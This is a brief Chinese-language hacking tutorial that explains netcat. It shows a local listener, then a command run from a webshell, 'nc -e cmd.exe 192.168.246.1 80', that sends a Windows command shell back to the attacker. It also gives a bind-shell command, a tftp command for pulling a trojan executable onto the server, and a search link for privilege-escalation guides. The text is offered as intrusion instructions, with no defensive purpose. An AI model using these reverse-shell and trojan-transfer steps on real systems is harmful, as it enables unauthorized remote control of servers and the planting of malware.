nc -l -v -p 80在本机监听80端口，此时80端口是打开的，我们可以在浏览器输入127.0.0.1进行浏览，此时就会出现连接，我们再在监听窗口输入字符，就会在浏览器上显示了。知道上面的作用后，我们就可以在此的基础上，再在webshell里面执行 nc -e cmd.exe 192.168.246.1 80此条命令会把cmd反弹到192.168.246.1上，我们就可以想在本地一样，使用cmd。这里是nc的命令说明：-l 监听本地入栈信息-p port 打开本地端口-t 以telnet形式应答入栈请求-e 程序重定向D:\www\aram\nc -l -p 110 -t -e D:\www\aram\cmd.exe传马命令：tftp -i ip地址 get 木马名字.exe如果不懂的话看这里的教程：http://www.baidu.com/s?wd=NC反弹提权+site%3Apan.baidu.com&rsv_bp=0&ch=1&tn=98012088_3_dg&bar=&rsv_spt=3&ie=utf-8&rsv_n=2&rsv_sug3=1&rsv_sug1